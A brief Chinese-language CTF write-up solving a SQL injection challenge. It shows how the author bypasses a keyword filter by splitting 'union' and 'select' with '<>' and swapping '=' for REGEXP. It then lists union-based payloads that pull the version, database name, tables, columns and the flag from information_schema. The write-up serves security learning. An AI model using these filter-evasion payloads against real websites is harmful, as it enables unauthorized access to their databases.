看提示,他告诉我是个注入。。。试试
在url处疯狂尝试?id=1’,1”,1),1’),1”),1’#......发现都没有报错,看来不是报错注入了
然后尝试直接使用union select 1,2,3发现也不行。。。。有点蒙,看了下别人的wp才知道这里的union = 和select被过滤了,具体也没搞懂怎么发现的,因为union和select在url中的回显没问题。。。。。Bp抓了也看不出问题,网页提交也只是inj code。。。。具体解决方法是使用在union和select中放置<>而=用REGEXP代替,双写和混插也会被过滤掉。。。真是个新奇的解法
不管了,抛开这个题还是很简单的
直接?id=1 un<>ion sel<>ect 1,2,3
回显了个2,直接在2处进行注入
查版本:?id=1 un<>ion sel<>ect 1,version(),3
查数据库名:?id=1 un<>ion sel<>ect 1,database(),3
查数据表:?id=1 un<>ion se<>lect 1, (se<>lect group_concat(table_name) from information_schema.tables where table_schema REGEXP %27sqli%27),3
查列:?id=1 un<>ion se<>lect 1,(se<>lect group_concat(column_name)from information_schema.columns where table_name REGEXP 'info'),3
查信息:?id=1 un<>ion se<>lect 1, (se<>lect group_concat(flAg_T5ZNdrm) from info),3
